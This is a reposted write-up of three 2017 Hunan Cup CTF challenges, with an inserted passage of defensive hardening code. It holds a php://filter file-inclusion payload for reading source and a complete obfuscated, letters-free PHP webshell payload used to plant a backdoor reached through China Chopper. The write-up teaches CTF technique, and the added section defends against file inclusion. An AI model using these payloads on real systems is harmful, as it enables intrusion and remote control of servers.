hxb 2017 Partial Writeups

0x00 Preface

As a relative beginner, I squeezed out some time to attempt this year's Hunan Cup (hxb). I only looked at the challenges near the end and solved three of them; here is a share of those.

0x01 Challenge 1: web200

At first glance the challenge looked like a file-upload task, but a few attempts got nowhere. Clicking around, I noticed the op parameter in the URL, which suggested a PHP file-inclusion vulnerability.
I tried it and obtained the source of index.php.

0x02 Reading the source with php://filter

When using the php://filter wrapper to fetch the source, note that "resource=index" must not carry a file extension. Reading the index source confirms this: the ".php" suffix is appended in the code itself.

<?php
error_reporting(0);
define('FROM_INDEX', 1);

$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
    die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');

function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
    <div id="header">
        <center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center>
    </div>
    <div id="body">
<?php
}

function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}

function page_bottom() {
?>
    </div>
    <center>
    <div id="footer">
        <div>
            <p>
                <span>2017 &copy; </span> All rights reserved.
            </p>
        </div>
    </div>
    </center>
</body>
</html><?php
ob_end_flush();
}

register_shutdown_function('page_bottom');

page_top($op);

if(!(include $op . '.php'))
    fatal('no such page');
?>
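As an added, defender-side example (not part of the challenge or the original post): the router above only rejects "..", so a wrapper such as php://filter/... still reaches include and discloses source. The version below keeps the same ?op= scheme but resolves the page against a fixed allowlist and a fixed directory; the pages directory and the page names are assumptions.

```php
<?php
// Added example, not the challenge's code. Hardened router for ?op=<page>.
// Assumed layout: each page lives as pages/<name>.php next to this file.
const PAGES_DIR = __DIR__ . '/pages';           // assumed directory
const ALLOWED   = ['home', 'upload', 'about'];  // assumed page names

function resolve_page($op): ?string {
    if ($op === null || $op === '') {
        $op = 'home';
    }
    // Exact allowlist membership (strict compare) rejects arrays, stream
    // wrappers such as php:// or data://, traversal and null bytes without
    // relying on a deny-pattern like /\.\./ that wrappers simply bypass.
    if (!is_string($op) || !in_array($op, ALLOWED, true)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $op . '.php');
    // realpath() canonicalises and returns false for missing files; the
    // prefix check also stops a symlinked page from escaping the directory.
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['op'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('no such page');
}
// Only a canonical path inside PAGES_DIR ever reaches include.
include $page;
```

Logging rejected op values (especially anything containing "://") gives a cheap detection signal for wrapper-based inclusion attempts like the one used in this challenge.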

0x03 Getting the flag

Requesting flag.php in the URL shows that the file exists, so read its source directly to get the flag:

http://114.215.129.72:10080/?op=php://filter/read=convert.base64-encode/resource=flag


0x04 Challenge 2: MISC traffic analysis

Looking through the HTTP streams reveals a flag.zip.

Follow the TCP stream, paste the hex of flag.zip into WinHex, and save it as flag.zip.

Extracting it yields a ce.txt.
On opening it I first assumed it was a QR code, but after a long time got nowhere; it turned out to be RGB values from which a PNG image can be reconstructed.

cat -n ce.txt | tail -n 1
98457   254, 255, 255

There are 98457 lines in total, which can be laid out as an 887x111 image (flags in images like this are usually one long string, so I tried these dimensions).

Script used to generate the PNG:

#! /usr/bin/python2.7
# Rebuild the PNG from ce.txt: one "R, G, B" triple per line, 98457 lines,
# laid out as 887 columns x 111 rows. The file is consumed column by column
# (outer loop over x), which is the order that produced the readable flag.

from PIL import Image

x = 887
y = 111
im = Image.new('RGB', (x, y))

with open('ce.txt') as f:
    for i in range(0, x):          # column
        for j in range(0, y):      # row
            lst = f.readline().split(',')
            # int() tolerates the surrounding spaces and trailing newline
            im.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))

im.show()
im.save('flag.png')

0x05 Challenge 3: web300

After some testing, letters, digits and several symbols turned out to be filtered, and a webshell still had to be uploaded.

I found an article by P牛 (phith0n) describing a webshell built purely through PHP type juggling.

Payload

http://114.215.133.202:10080/?content=$_=%27%27;$_[%2b$_]%2b%2b;$_=$_.%27%27;$__=$_[%2b%27%27];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____=%27_%27;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);

Connect with Caidao (China Chopper); the password is "_".


Reposted from blog.csdn.net/hardhard123/article/details/78705716